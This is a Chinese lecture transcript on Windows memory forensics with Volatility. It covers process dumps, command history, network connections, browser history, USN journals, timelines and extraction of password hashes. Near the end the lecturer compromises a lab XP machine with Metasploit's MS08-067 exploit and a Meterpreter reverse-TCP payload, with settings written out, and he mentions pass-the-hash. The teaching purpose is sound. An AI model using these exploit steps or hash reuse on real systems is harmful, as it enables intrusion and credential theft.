PS list 呢，我已经给大家看过了，就是这个进程，然后 PS tree 也给大家看过了。然后我们刚才对了，这个刚才我们说，如果你查看这个 PS list 的话，你会看到这里面有很多的这个进程。那如果说你对某一个进程比较感兴趣，如果你怀疑这个进程可能有问题的话，那你想把这个进程相关的内存信息给它单独保存出来。也就是说，我现在有一个Win7这台计算机这个操作系统，它整个内存所有的东西，但是我想把它从中提取出一部分是某一个程序，这个程序它所使用的这个内存里的这个内容相关的这个内存信息，我单独把这个进程对应的这个内存信息给它提取出来的话，那么我们可以用这个 memdump 呢，然后后面可以跟上一个你具体要提哪个进程它的这个 PID。好，比如说我们就想 dump 这个，就它吧，就 dump 8吧，或者换一个这个画图，比如说就想这个查这个画图，这个就想查这个画图这个进程，它的这个内存里有什么数据，有什么东西。我们可以通过这个-T1096，这是它的这个 PID， 然后呢再跟上一个-D 的意思也就是给它这个输出，把这个进程对应的内存的数据给它 dump 出来，保存到一个目录文件夹里面。比如说你在这儿先建一个文件夹吧，先建一个这个MEM 吧。建这么个文件夹，然后我一会儿导出的内容都给它存到 MEM 目录里面。好，我们回车。那么现在我们就去 dump 这个1096，这个进程，1096对，这个进程它对应的这内存里面的数据 dump 下来之后呢，我们把它保存到这个MEM 这个目录下。好 ，dump 完了，保存成了一个1096.dump 文件，可以 lsmem 查看一下这个文件夹。一看，哇，这个内存用的还不少。它是把操作系统里面跟这个进程运行相关的所有的这个系统内存都给这个 dump 下来了。所以只要跟这个程序运行有关系的这些这个内存都给 dump 下来了，所以这个内存还比较大，200多兆。这是 dump 它的内存。好，那么 dump 下来这个内存呢，这个内存里面其实就是当前这个程序它运行过程中的一些个这个存放在内存里面的数据。所以我们要想查看这个dump 文件，这个1096.dump 文件里面都有哪些东西呢？我们就可以比如说用这个 hex editor， 然后1096.dump， 我们就可以来查看，通过16进制的这种方式来这个查看里面都有什么东西。然后比如说这儿看到有个目录，这个 C 盘下的 Windows System 32，然后有个 DLL， 这个 System 32下的什么什么什么。当然这样看起来好像不是特别的这个舒服，但是信息都在这里了。接下来如果你想查更多的东西的话，那就需要在这里面进行筛选。另外呢，我们还可以使用像这个，比如说你这个比较感兴趣，这里面有哪些个关键字符串。那么因为这个 dump 文件200多兆，你一行一行自己就肉眼去看的话就太费劲了。所以如果说这个我们直接去查一下这个 dump 文件里面有哪些个关键字符串的话，那么就比较容易去这个发现里面可能存在的这个最直接的线索。比如说我们 string 1096
你可以查看这个 dump 下来的文件里面有哪些关键的字符串，那么这些关键字符串，那么有可能就给我们提供一个取证的一个这个直接的线索，非常有力的一个线索，有可能是。当然，这个字符串大部分可能都是无意义的。我们刚才看到这儿有一个路径，那你可以看到它的内存空间里存放了自己这个应用程序所存放的这个系统路径，然后这里面可能有一些系统函数的这个调用。那么如果这是一个恶意程序的话，比如说你的服务器中招了，然后你来取证，然后你发现这个进程有问题，你把它进程内存的信息都保存下来，在这个内存信息里很有可能就有那个恶意程序，比如说那个僵尸程序、木马程序，它的自己的这些函数的这个名称，有可能直接就能看得见。所以这些都是我们做进一步去杀掉这些做取证、做事件响应的这个后续的一个基础。好，那么这里面还会有一些系统这个变量啊、系统环境变量等等这样的相关的这个信息。那如果这是一个恶意程序的话，有可能这里面就有它的调用了哪些系统的这个库文件啦等等的这样的一些个关键字。然后还有说甚至我之前这个在分析一个这个僵尸程序的时候，还发现其中就有直接有几条这个语句，就是说如果防火墙是开启状态，然后就给它怎么样给它关掉，修改那个注册表，在这个 string 里面，这个字符串里面都能查到相关的这个信息。通过这些个功能，它这个字符串所这个直接表现出来的这个程序的功能，那么程序的这个它是做了哪些操作、哪些动作，通过这些信息，我们基本上可以判断这个东西大概是有问题还是没问题。好，那么这儿我就不再给大家详细去看了。总之这样的话呢，我们就可以去查看其中的这个特征字符串啊，比如说这个，我们想查其中有没有这个像什么 password 这样的一个关键字的话，那你可以去 grep 一下，一看，哦，这里还真有关键 password、shell password、password list， 哇，在这个画图工具的这个内存空间里，怎么会有这种这个关键字 shell password.txt.lnk， 这是快捷方式，这就有点值得怀疑了，所以这就可以作为一个线索，我们进一步再去细查，到这个文件系统里面去找，说这个文件系统里是否有这么一个文件，那么这个文件又是被哪个进程所调用的，然后逐级一点的去把这个最终的所有的可疑的东西全都查出来。我还真没想到这里面居然有 password list， 这个有点值得怀疑的。然后另外，如果像 password 这个太明显，有的这个一般的这个黑客可能都不太会直接用 password 这么完整的一个这个单词。但是有些情况呢，比如说他对某个系统做了登录的话，如果使用 Linux 系统去登录目标系统的话，目标计算机的话，那都很有可能会使用到这个 at， 就是 user at 一个主机，会使用这种格式去进行登录。那如果说其中包含这个 at 这种特征字符的话，你可以把它搜出来。当然这个 at 这个符号有点太通俗，所以这里面的内容比较多。好，我只是提这么两个关键字吧，然后这个更多的大家可以自己去总结一下。然后除此之外呢，那么我们取证的时候可能还比较关心说这台计算机上，那么是否如果说怀疑已经被人家入侵了的话，那么入侵你这台系统之后，那么通常如果你是 Windows 系统的话，那么为了不引起你的怀疑，通常来说这个攻击者都会先取得你的命令行的 shell，
然后直接取得你图形化的这个 shell 的话呢，有可能就造成你发现。然后一般来说，攻击者会使用命令行的 shell， 然后通过命令行那样悄悄的去做一些个渗透攻击的行为，然后这个会比较隐蔽一点。所以这个时候呢，我们可能也会在做取证的时候也会比较关心，说这台机器上曾经执行过的这个 CMD 命令，执行这个就是命令行的这些指令，这个执行过哪些，就类似于像我们在 Linux 下那个 history， 我历史曾经执行过哪些个这个系统指令，然后通过这些系统指令有可能会直接发现说这个人在我这台机器上，然后敲了哪些系统命令，然后改了哪些注册表，然后这个是否关了我的这个防火墙，又把什么东西，比如说把 NC 注入到我的这个系统服务里了，等等等等，这些东西都有可能通过这个命令历史就发现出来。这一条不论是 Linux 还是 Windows 系统，那么我们都是这个需要去做的。就一上来我们先 history 在 Linux 系统上看一下，说这个曾经登录到我这台系统的这个人，他都敲了哪些命令，然后他改了哪些文件，那么大概会有一个思路给我们提供出来。所以这个插件呢，我们使用的是这 CMD scan， 也就是用来查我的这个命令历史，命令行的历史。但是大家注意，这里面只是命令行的历史，就是通过这个 CMD 这个窗口这样来敲进来的这些命令，而不是说我通过点击鼠标打开的那种图形化的这个命令，这个是不一样的。好，下面我们就来看一下这个命令历史 CMD scan。好，发现这个 CMD scan 的记录呢有两个，一个是 cmd.exe， 一个是 dump8。这就是那天我在运行 dump8 的时候，因为 dump8 它也会打开一个命令行窗口，然后再调用 CMD 打开命令行窗口，然后执行自己。所以我这儿能看到的命令行历史就是这两个，这是通过这个命令行窗口来执行的命令，其他的打开的这个计算器啦，打开的画图工具了，在这里是看不见的。然后它们对应的这两个进程对应的这个这两个命令对应的进程 ID 也都在这儿可以看得见。好，那么接下来呢，我们再来看一下这个你系统大概说看看你都有哪些系统进程啊，然后这个你都运行了哪些命令啦，然后这个你的注册表建值啦，这些大概的都检查了一下。完事之后，那你都运行过哪些程序啊？这些都查了一下。然后这个操作系统的，我们大概查完之后呢，接下来我们就比较关心的一件事情就是这个你这台机器上都有哪些网络连接，开了哪些网络连接？因为我们知道，如果这台计算机那么它中招了，它上面被中了一个木马，被中了一个僵尸程序，那么这个僵尸程序或者木马，它肯定会去反弹去连它的 CC 控制端，然后接受控制端对它的这个控制下发进一步的指令，所以它一旦做反弹连接的话，那么就会有一个网络连接出现。所以一般我们在操作系统上呢，就会使用 netstate 什么什么这样的一些个参数来查看，说我当前这台机器都有哪些个网络连接。那么在内存里面如何提取这个网络连接信息呢？我们可以使用这个NetScan， 使用这个插件叫 NetScan 这个插件。好，一看有这么多的这个网络连接信息，当然这个网络连接信息呢就是比较全面完整的，
包括你这个真听状态还没有人跟我建立连接的，那我也会把它显示出来。还有已经建立连接的这些个我们看看有没有已经建立连接的，好像没有。established 的就是已经建立起连接的，还有这个 closed 的它都会把它列出来。然后还有像这个 UDP 的连接，我们也需要把它当然 UDP 无所谓连接了，它是面向无连接的这个协议。然后这个TCP 的 TCP4 TCP6，然后对应的什么端口 listen 的还是 close 的还是 established 的，所有的都会这个显示出来。那如果说我们只想看那些已经连接起来的，那么我们可以用这个大家稍等我一下啊，一会儿有点事情。好，我们回来。我们刚才说到哪儿了？网络连接。我们通过这个 NetScan 可以查看所有的这个网络连接，包括真听的，包括这个已经建立的连接，还有已经 close 的连接。那么如果说我们只想看已经建立起来的连接呢，那可以使用这个Connect Scan， 可以使用这个插件。这个命令不支持。不会吧？应该是支持的。稍等，我找一下这个插件的名称，我是不是忘记了？我们在这里找一下吧。我们其实这个 volatility 所有的这个插件呢，都是放在一个目录下的。那么这个放置插件的这个路径呢，就在这个Python 2.7 下的 distr pack， 然后是这个 volatility 下的 plugin。这个路径就是这个 volatility 所有的插件，我刚才上面使用的所有这些命令，其实都是它的插件，调用一个插件来执行一项这个数据的采集和分析。那么我们说这些所有的插件呢，其实都是放在这个系统路径下的。我们可以到这个系统路径下来找一下，scan 应该没问题啊，我没敲错的。这个命令 does not volatility 杠 f profile 好像对这个映像不起作用，因为它有可能是只针对32位系统的。那么没关系，这里面不是每一个插件都适用于每一个类型的这个操作系统的。那么这里面还有其他的插件，我就顺道提一个吧，比如说这个 IE History。利用 IE History 这个插件呢，我们可以查看Win7那台电脑我们 dump 内存的时候，那么它的这个 IE 的这个历史信息，也就是你用 IE 都访问过哪些网站，哪些个网址，然后下载了哪些个 URL， 下载了哪些程序，那么这些都在 IE 的 History 里面会有，所以我们通过这个内存还可以看它的 IE History。
那么这个 IE history 呢，就是通过 IE 去打开的，并不一定非得是这种网址 URL。我们通过 IE 也可以打开一个文本文件，也可以去这个打开一个不是这种 URL， 就是一个本地文件，也可以通过 IE 去打开。所以这个凡是通过 IE 去访问打开的，或者是其他程序去调用 IE 去打开的，那么都会在这里被记录下来。所以像我访问过这个网址，然后这都是 URL 网址了，这都是 HTTP 的。然后访问的时候，你访问的哪个 URL， 访问的这个 JS 这个脚本，然后这些个访问时间，然后 HTTP 协议，包括这个 HTTP 请求头、etag 等等这些信息，这个服务器的这个 ASP.NET， 另外还有说这个请求通过 IE 做的这个请求是由哪个用户发起的请求，那么这里面会有一个 U:W7， 这 W7 就是我当前系统登录的那个用户账号，是由这个账号发起的这个访问请求。所以这样的话还可以把这些网络访问行为一定程度上定位到一个用户账号上面，进而我们就可以定位到那个人的身上。你看像这个呢，那么这个访问的资源它就不是一个 URL HTTP 那样的 URL 网址，而是一个一个本地系统的一个路径。这是一个图片 frame.exe 还有 DLL。 好，大概其就是这些吧。这个往上看还有很多。如果这里面我们发现了这台机器这个用户曾经访问过一个明显是一个黑客网址的这么一个 URL， 然后在里面下载了一个 EXE， 或者下载了一个什么这样的 zip， 然后我们就可以去找了。既然你下载了这个 zip， 这个 zip 是不是有问题？然后有没有现在运行的进程跟这个 zip 是有关系的？好，那么这是网络连接，我顺道又提了一个这个 IE history。然后刚才我们提到这个注册表，注册表里面有这个 have 这个蜂巢，我们刚才列出了所有的蜂巢。那么但是列出蜂巢之后呢，我们刚才是看到了这个用户只查看了这个用户账号，但是我们说这个其实用户账号它的这个加密之后的哈希值，密文的哈希值其实也是放在这个注册表里面，那么也被内存缓存到了这个内存里面。所以我们这个 dump 文件里面呢，内存的 dump 文件里面肯定也有这个用户密码的这个哈希值。所以那我们如何把这个密码的哈希值给它提取出来呢？只要有了哈希值，那么我们就可以做这种 pass the hash 这样的一个工艺。然后sorry， 我们现在是做取证啊，我又变成那个渗透测试那个思路去了。好，当然这个信息也是我们这个必须要了解的，就是如果一旦了解，那么你在取证的时候发现这个被人新加了一个用户账号，那么这个新加的这个用户账号呢，我们查到它的密文，这个账号如果不是管理元件的，我们查到这个密文就可以想办法破解它的明文。或者是通过也可以用 pass the hash 这个方式，然后登录进去看看这个账号它的用户配置文件里面它都运行了哪些东西，运行了哪些系统命令，它的命令历史是什么，这都是一系列的这个思路在里面。好，我们先把这个所有的这个蜂巢都给它列出来。列出来之后呢，因为我们要在这个内存里面去找这个用户的密文，这个用户密码的这个哈希值的话呢，那么我们必须要使用到这个2个蜂巢，其中2个蜂巢。那么首先我们用这个 hash dump， 也是从这个
内存配置文件里面去 dump 这个哈希这样的一个插件，用这个插件。然后呢，后面我们要跟上2个参数，一个是 system 这个参数，一个是 sam 这个参数。那么 system 这个参数呢，它不是说跟 system 这个字符串在这儿，而是用什么呢 ？system 这个注册表键值对应的这个内存地址。然后后面杠 s 这是杠 y 后面跟上 system， 然后杠 y 呢后面跟上 sam 这个蜂巢它的这个内存地址。有了这2个内存地址匹配在一起，我们才能把其中这个 hash 这个用户的密码的这个哈希值给它提取出来。好，提取出来了 administrator guest 和这个 w7。那么一看呢，通过这个检查，其实我们也可以发现说，这个你这个administrator 这是一个明文，没有设密码，空密码，然后这个 guest 也是空密码。那么你通过这个事件响应的时候，你可能会发现这是一个安全隐患，别人可能会通过你这个空密码的管理员账号登录进来，所以这可能是一个线索，所以你就可以进一步去查administrator账号是不是已经启用了，然后他设的空密码，别人使用什么方式，这个可以登录进来。好，这是这个有进一步的一些个这个插件的使用方法。然后我们继续，刚才介绍这些插件呢，都是这个 volatility 它默认自带的。那么刚才我们说，其实这些插件呢，我们也可以在外部扩展，你可以自己编写，也可以去某些网站上去这个下载。那么比如说我们可能会比较经常使用到的，就是你想查，比如说如果说你发现目标那台机器上那么装了 Firefox 这个浏览器的话，那么既然用浏览器，那么像 IE 就类似于 IE 一样，你既然有浏览器，那我就会关心你 IE 浏览器历史曾经访问过什么 URL， 然后通过这个为线索去进一步调查。那如果说你用的是 Firefox 浏览器，那我也会关心你 Firefox 的这个历史。而这个 Firefox 浏览器的这个历史记录呢，默认情况下在 volatility 里面是没有一个插件是可以去查这个 Firefox 浏览器的这个历史记录的。但是我们可以在网上找到它的一个有另外一个这个安全研究人员自己写的这么一个插件。那么具体下载地址呢，可以在这儿去下载。那么我是已经提前下载好了，所以大家可以自己去下载一下。那么当你把这个插件下载下来之后呢，就直接拷贝到我刚才给大家看的那个volatility 所有的插件所默认存放的那个路径下。一旦存放到这个路径下，那你就可以使用这个插件了。使用方法和其他的插件都是完全一样的，只要把这个插件的存放的这个插件的这个用户名放到这个我们的 volatility 这个指令后面，就类似于这个。好，那么我下面给大家演示一下吧。这个因为我已经提前下载好了，我就直接把它拷贝过来。没有啊，可能被我删掉了，没关系，我来重新下载一下吧。我们在Kali里面去直接下载吧，就不用再拷贝了。IP 还不对，好，我们把它下载下来，很小，插件都很小。这些插件其实呢，
就是一些个 Python 的这个脚本文件。你可以看到把它解压出来，解压出来之后，你可以看到其中有这个包里面有好几个这个插件，那么我们可以把这些插件全都拷贝到默认这个 volatility 默认存放插件的那个路径下。那么这里面其中有一个就是这个 Firefox history.py， 我看这都是 Python 的脚本，我们都可以查看里面的这个代码它是怎么写的这个脚本。然后我们需要做的就是把这些解压出来的这些脚本呢，给它copy 到默认的 volatility 的插件文件存放的路径下。一会儿我们要使用到的就只有这个 Firefox history 这一个，以它为例吧，其他的也都类似了，还有这个 Chrome history 等等，还有这个 SQLite， 还有这个 uninstall info 等等，这些都类似。我们就以这个 Firefox history 为例，来给大家做一下演示。那么我们现在这里面有这么多的 Python 的这个脚本，把它直接move过去吧。move 星.py 到 USR 下的 lab 下的 Python 2.7 下的this package volatility plugin， 拷贝到这个把它移动到这个路径下，移动过去之后，好，移动过去之后呢，我们就来，比如说我们要使用这个 Firefox， 那么这个插件的这个文件名呢叫 Firefox.py， 所以我们要用这个插件的话呢，那么就把 py 去掉，就只用这个 Firefox 就 OK 了。比如说现在我们要用这个 Firefox 这个插件了，好，把 py 去掉。如果我们要对这个内存文件来使用这个插件来查它的这个 Firefox 的这个插件，这个 Firefox 的这个浏览器历史的话，那么就这样来使用就可以了。所以插件使用比较简单，你只要找到它下载，然后放过来，一运行就 OK 了。好，那这是一个。那么这种插件呢，在网上有很多，然后我再给大家介绍一个吧，这个也算是比较有用处的，叫做 USN 的这个日志记录。我们知道这个 Linux 下的这个 EST4 啊、EST3 啊、EST2 等等这些文件系统呢，都是日志型文件系统。然后这个其实 NTFS 呢，也有它自己的这个日志记录的这种功能。虽然 NTFS 不能算完整的这个日志型的这种分区格式，但是 NTFS 它有它的这个 USN 日志记录这种功能。那么它的这个功能的作用呢，就是 NTFS 的 USN 日志记录，它记录的就是这个 NTFS 这个分区里面，那么它的内容的变化。比如说你在这个分区里面新增加了一个文件，然后这个在里面添加了一些信息之后，编辑一个文本文件，在里面添加了一些内容之后，然后保存之后，这个文件的大小发生了变化等等这样的这个对硬盘内容的这些个变化，那么它都会每一个变化都会记录到这个 USN 日志里面的一条记录。
但是这里面我要强调一下，就是像我刚才所说的，你如果对这个 NTFS 分区里面的一个文本文件去修改它的内容，在里面添加了1万行内容，然后保存出来之后，这个 USN 日志它不会把你添加的那1万条内容给它记录到日志里面，否则的话这个日志就太大了。那么它记录的呢是说你这个文本文件从刚才这个1K 大小现在变成了这个10兆那么大，它记录的是这个文件的这个状态的一个变化，大小的变化，然后权限的变化，然后原来没有这个目录给增加了一个目录，然后现在这个刚才有一个文件现在给删掉了一个文件等等这样的一个变化，就是它不会记录这个具体的变化的内容，它只是记录发生了什么变化这个事儿。那么这也是一个这个，因为它的插件都是 Python 脚本，所以这也是一个这个 Python 的脚本，所以我们也可以到这个路径下去把它给下载下来就 OK 了。所以我们在这里呢，我们就直接用 wget。刚才那个 Firefox 浏览器插件的运行结果是什么也没有，因为我那台机器上根本没装 Firefox， 所以你在它的内存里去找 Firefox 的这个浏览器历史的话，也什么都找不到。好，那我们下面就来看这个刚下载下来的这个插件，那么我们也要把这个插件给它放到这个 USR Lab Python 2.7， 然后distro package， 然后 volatility plugin， 也要把它放到把这个文件 USN 这个文件放到那个路径下 ，OK， 放过去之后，那你就可以使用它了。那使用方法呢，跟这个之前的方法一样，也是直接调用这个插件。你可以查看它的这个 USN 日志内存里缓存了多少这个 NTFS 文件系统的这个 USN 日志。好，没事，可能会比较多。哇，大量。因为你对这个 NTFS 分区里面的任何文件做任何的这个修改，它都会被记录一下。比如说这个什么时间，然后你对哪个文件做了一个修改操作，那么这个修改操作是什么呢？是 delete， 把这个文件这种临时文件，程序运行过程中都会生成很多临时文件，那么这个临时文件你是这个用完之后不需要了，那么操作系统就会把它给删掉，所以这是 delete 这个操作。然后像这个就是 create， 这是刚创建的这个临时文件，创建完用完了之后，然后就给它 delete 了，看这两个文件名是一样的。然后我们再往上看一些，像这个 readme， 然后这是基本信息变更了。这个 basic info change 就基本信息发生了变化，然后这是归档，然后是只读，就可能是把它变成只读文件了。然后这是这个文件，然后还有像一些个，比如说这个，那么它的这个操作是 extend， 就是把内容给扩充了，扩大了，里头增加了新的内容进去了。然后这还有 dump it。那么这是应该是 dump8 在运行过程中创建的一些临时文件，然后这个临时文件呢，这也是这个 create 新创建的。然后我们再往上面看看有没有什么其他的，包括你运行程序的时候生成的一些临时文件呐，然后日志文件呐，这些发生的变化，比如说你运行一个程序，然后发生报错了，那么它向日志里面写入了一条记录，那么这个也是对文件的这个内容的一个变化，所以它也是 extend， 这增加了一些内容。总之你在这台机器上对所有的文件做的所有的操作，所有的修改，那么这个操作修改这个事儿，那么它都会被记录下来。还有这个 link 创建了一个快捷方式。
那么通过这些个文件的变化呢，我们也可以发现，就是哪个人什么时间来到你的机器上，他生成了哪些文件，删除了哪些文件，那么这个事儿也都会被记录下来。如果说那个人来了之后，那么放了一个木马，放完木马之后，又把这个之前的一些个入侵用的这个工具啊程序给它删掉了，然后又把文件类型的这个病毒也删掉了，然后删完之后呢，又把自己隐藏到注册表里面，那么所有对文件产生的修改，这里面都会记录下来。当然，通过这些记录下来的这些信息，你把它分析还原出来，说这个攻击我的黑客他是怎么干的，在什么地方放了这个文件，然后又在什么地方删了这个文件，你把这些信息给它串联起来，勾画出这个完整的黑客的攻击路线，它的行为轨迹，这个是比较困难的，因为这个数量比较大，所以这里面也需要结合一些个技巧来进行这个分析的动作。好，你像这个就修改了这个 security， 那么这个 security 呢，它就是这个一个注册表的一个 have， 一个蜂巢，还有 software， 那么这也对注册表进行了修改，但具体修改了什么内容，这里面不记，记不了那么多东西。好，那么当然同时呢，因为这个量比较巨大，所以我们在这个生成的这些信息之后呢，我们可以通过这个 output 的方式，把我们生成的这些信息给它导出出来，导出成像比如说 CSV， 然后这样就可以拿 Excel 去对它进行过滤、筛选、排序，然后去方便我们对它做分析使用。那么做分析，这个如果说想把它导出的话呢，那就使用这个杠杠 output 等于说 CSV， 然后杠杠 output field， 我导出的格式是 CSV， 那具体导出哪个文件呢？比如说这个usn 点 CSV 导出成这个文件。好，这样的话，它就会把上面刚才查到的所有这些信息都导出成 CSV。好，导出完成之后呢，那么我们看这有一个 CSV 文件，那么接下来我们就可以，比如说直接move过去吧，move usn 点 CSV 到我的物理主机上去。好，move过去之后，然后我们到我的 D 盘里面去找一下这个文件 usn 点 CSV， 然后我就可以用 Excel 把它打开了。好，你看，然后你可以对它做排序啊，等等等等处理，就会比较容易方便一点。一共800多行。好，那么我们继续往下看，还有一个下面这个插件呢是这个 timeline， 就是这个时间线，这个这个插件呢，它不是需要我们单独下载的，它是这个 Volatility 里面默认自带的。这个的东西，这个插件它的这个功能比较有趣儿，然后这个它会从多个位置、多个这个地方去进行信息收集，收集完成之后呢，构成我们刚才说那个 USN， 那么 USN 它记录的只是你对硬盘的所有的操作，但是这个 timeline 呢，它会从多个位置去进行信息收集，收集完成之后呢，尽它最大的能力，尽最大的可能性，把这台机器上曾经发生过什么事情，然后所有人都做过哪些操作，会把这个整个的时间线给你这个规划出来、勾画出来，所以它的信息量当然更加巨大，然后我们需要从中去做这个分析，才能这个判断出来说到底这台机器上发生了什么事情。那么我们下面就来运行一下这个插件，叫 timeliner。
大家可以看到这个内容非常多，先从这个 IE history 去收集，然后都执行了什么东西啊，访问了什么 URL 啊，这个哪个产生了一个进程，然后这个访问了一个 URL， 然后这是从 IE history 往外收集，然后它具体访问了哪个 URL 地址啊，也当然不一定非得是网络 HTTP 那种 URL 的，也可以是这种文件型的。我曾经用 IE， 这是来自 IE history， 我用 IE 曾经看过这个文件，这是一个这个 HTML 的这个文件啊，一看呢，这是这个扫描器 AWS 的这个帮助文件版本信息，然后这个查看过这个 Web Inspect， 这也是一个扫描器，惠普的一个扫描器。然后曾经访问过 LinkedIn， 然后这堆 URL 这都是我曾经访问过的。然后这是 IE history 我都干了些什么 ，IE 历史里面我都做过什么。然后接下来又查说这个 handle key 这个注册表里面的这些位置。然后产生了哪些个进程 ID 等等这样的一些个信息，然后这个TE header、TE debug 都运行过哪些程序，这个 LSA、SA 啊，然后这个完了之后。PE header 还有什么 DLL load time， 我曾经 load 过什么什么 DLL 是由哪个进程 load 的，然后 load 的是哪个这个 DLL， 什么时间 load 的，这些都会有记录。这个它就其实是这个 volatility 可能是里面最全面的、尽最大能力的信息收集的这么一个插件，对吧？能收集的信息基本上在这里都收集出来了。然后什么时间产生了什么进程 ，ID 是什么，然后访问的哪个路径，修改了哪个注册表的键值等等这样的一堆的东西，所以这个量非常之巨大。那么如果你的内存文件还更大的话，那这个内容还会更多。那么 PE header user existence 现在到 user existence 了。user existence 刚才我们说手动我们可以自己去敲 user existence， 但是它现在这一个 timeline 是吧，整个全都给你做了。这个信息量是巨大，简直是最详细的一个信息收集了。timer 时间 OK 完成了。当然这些提取出来的东西怎么分析怎么看，这个就有太多可以说可以讲的东西，但是我们在这里呢只是给大家提这么个思路吧，具体怎么看怎么分析，大家去参考一些个其他的书籍吧，就是讲这个内存取证的，尤其讲 volatility 的这个工具的，其他的书籍大家可以去看一下。然后这个下面呢，我想这个给大家举一个例子，就是实例。然后比如说是一台机器，那么它已经中了这个恶意程序了，然后我们通过分析这个恶意程序，通过 volatility 来分析已经中了恶意程序的这个系统的这个内存，然后分析它的内存，从中发现这个恶意程序的存在。那么这里这一部分其实也有大量的东西可讲。然后为了我最初设想呢，是想这个因为 volatility 的作者，他最开始这个作者呢，最开始发布 volatility 的时候，那么他在网上同时分享了大量的已经被大家发现的这些个恶意程序，他在一些个计算机的在一些计算机上安装了这些恶意程序，然后让这个恶意程序在这台机器上进行肆意的感染了之后，然后去抓取这台机器的这个内存，抓取下来之后，把这个这些内存
这些内存文件放到网上，然后这个供大家可以免费去下载研究。这样的话就免去我们自己去准备这个实验环境这样的一个繁琐的过程。原本这些个内存文件呢放置在这两个路径下，但是很不幸，这个我在准备这次课的时候呢，去这两个网站上去看了一下，发现其中大量的内容都已经被删掉了，已经不存在了。但是我还是把这两个这个网址给大家公布出来。大家也许以后这个 Volatility 的作者会恢复这些个网站上的这些内容，那么在 GitHub 上也有，然后在它这个原本更早的这个 code.google 这个网站上，这个也有一部分。然后这些东西呢，就是这个你已经中了什么病毒了，比如说你中了这个宙斯 Zeus， 或者你已经中了这个 Darknet， 就是这个阵亡，或者是你已经中了什么这个 R2D2， 那么中了这些个典型的恶意程序的这个时候，那么包括还有这个 Dark Command， 就是我们在课程里面我曾经给大家使用过有一个叫黑暗彗星的，那么在这里面其实也有这个包括已经中了黑暗彗星的那些机器，它的这个内存文件。原本这些内存文件呢，就我们点这些链接都是可以下载的。比如说最开始我想给大家分析一下这个 StarNet， 就是这个阵亡病毒，但是呢我在准备课程的时候发现这个东西都已经是下载不到了，都已经没法下载了啊，这个下载都已经失效了，所以我在这里呢就没办法，只能是自己来准备一个已经中了这个恶意程序的，中了木马，中了这个后门程序的这些个机器，然后拿这些机器为例来给大家做类似的这样一个演示，然后以这个为例给大家就是从头梳理一下，说遇到了一个我怀疑可能是中招了的这样的一个计算机，我拿到它的内存的时候，我分析的时候这个思路流程是怎么样的，当然具体这个分析上的这个技巧就可以有千变万化，我这里呢只能给大家简单的演示一下这个思路了，大概的一些个常用的思路吧。好，所以呢我们下面就还是用这个 XT 这台机器吧。我们用它做靶机。OK， 21.94， 然后我先把这台机器的防火墙我们先把它关掉，然后呢我们在卡里上给它种一个这个 Meterpreter 的这个 shell， 然后我们再来抓取它的内存，然后来分析这个 Meterpreter 的 shell 在这台机器里面。以此为例来给大家演示一下，说拿到了一个内存 dump 你应该怎么做。好， 21.94， 然后我们回到这个卡里上，我们来运行这个 Metasploit， 先启动数据库，然后 MSF console.pure 启动 MSF， 然后我们还用那个经典的08067漏洞来这个把 Meterpreter 的 shell 种进去。好，我们 use exploit Windows SMB
S08067，然后 use payload set payload 这个 Windows interpreter reverse TCP， 然后 set rhost 192.168.21.94， 21.94没问题。然后 set target 34，因为这是一个中文版的 XRP-SP3 版本的系统。好，看一下。还有一个 set lhost， 就是我们本机我卡里这台机器真听的地址，我的地址是多少？21.34。好 ，exploit OK， 拿到 shell， 那么这边还一无所知。然后呢，我们把这个 dump8 拷到这台机器上，把它的内存拷出来。好，dump8 我们现在我们这个就已经是中招了的机器了，所以我们现在运行 dump 它的内存 yes， 保存成这个文件 success， 因为这台 XP 的机器内存比较小，所以速度比较快。XP 吧 ，XP 的 raw。然后我们把这个文件给它拷贝到我的物理主机上先。好，然后再拷贝到卡里上。XP 叫 raw 拷贝到当前目录下。好 volatility-f XP， 然后我们先看一下它的 image info。我打错字了。image info， 就是现在我已经拿到了一个机器，我怀疑它这个机器已经中招了，然后拿到它的内存，拿回来我要分析，我先要这个看一下它的这个 image info， 然后看一下它是这个什么系统。我们一看呢，它是 Service Pack 3，所以我们在选用 Profile 的时候呢，就选这个。然后它是32位的。这个英特尔架构32位的计算机操作系统，然后一颗内存，一颗 CPU。OK， 刚刚 profile OK， 这些基本的信息我们都准备好之后，其实 XT 我们也可以关机了的。不需要它，因为已经拿到它的这个内存这个 dump 文件了。好，接下来呢，我们就内存 dump 文件已经拿到了。首先，先来看一下，我们最开始说，我现在还不确定这台机器到底出没出问题。那么，我现在想先来看一下，说这台机器这个
是否有可疑的地方。所以一般来说呢，我们肯定是先来查看的，就是先来查看一下这个你的这个进程任务列表。通过这儿一查，看 Explorer， 然后 VirtualBox、Dump8， 那么 SVC Host， 看起来通过这个名字来看呢，没有什么可疑的地方。好，那么我们看完之后，那么如果进程没有什么可疑的地方，那接下来我们就来看一下这个，来查一下它网络有没有连接。因为如果你中招了的话，通常来说都会这个产生一些网络连接，因为这个它要连这个 CC 服务器。我们输入这个 conscan， 刚才在 Win7 上面这个 conscan 是执行不了，那么在这个 XP 系统上它就可以执行。我们一看呢，它建立了2个网络连接。你看，哎，这2个网络连接有点意思，一个是1048这个进程，一个是4这个进程。好，我们觉得这2个网络进程我还什么也没做呢，为什么产生了2个网络连接呢？这2个网络连接就是一个可疑的线索。好，一个是这个4这个 PID， 一个是这个1048这个 PID。然后接下来呢，我们针对这2个 PID 来检查一下这2个 PID 对应的这个 SID， 就是用户的这个 SID。我们先来查一下4。我们可以先看一下4是什么进程。4是这个 system 进程。sorry， 杠 T4， 我们得指定这个进程 ID 号杠 T4。好，4是这个 system 进程，所以呢，它的这个这个进程相应的权限有这个 system 权限，有 administrator 权限，有 everyone 权限，有这个 authenticated 就已认证用户这几个权限。那么通过这个 get SID 呢，对这个4这个权限呢查看一下，好像没什么收获，就只能查看到它这几个相关的信息。但是我们再看一下那个1048这个进程，因为1048这个进程它产生了一个网络连接了，我们觉得可疑。我们把4那个先撂一下，然后先来看那个1048这个进程呢，一看是 SVC host。我们默认情况下，一个计算机，尤其 Windows 计算机启动之后呢，会产生好几个 SVC host。那么从表面上看 ，SVC host 它也没什么可疑的。但是我们注意到这个，除了这个 SVC host 之外呢，其实我们发现还有另外几个 SVC host。比如说这个1104，然后这个1252，然后这个956，那么还有这几个 SVC host， 这儿还一个这个868，这几个都是 SVC host。我们想比较一下，说这几个 SVC host 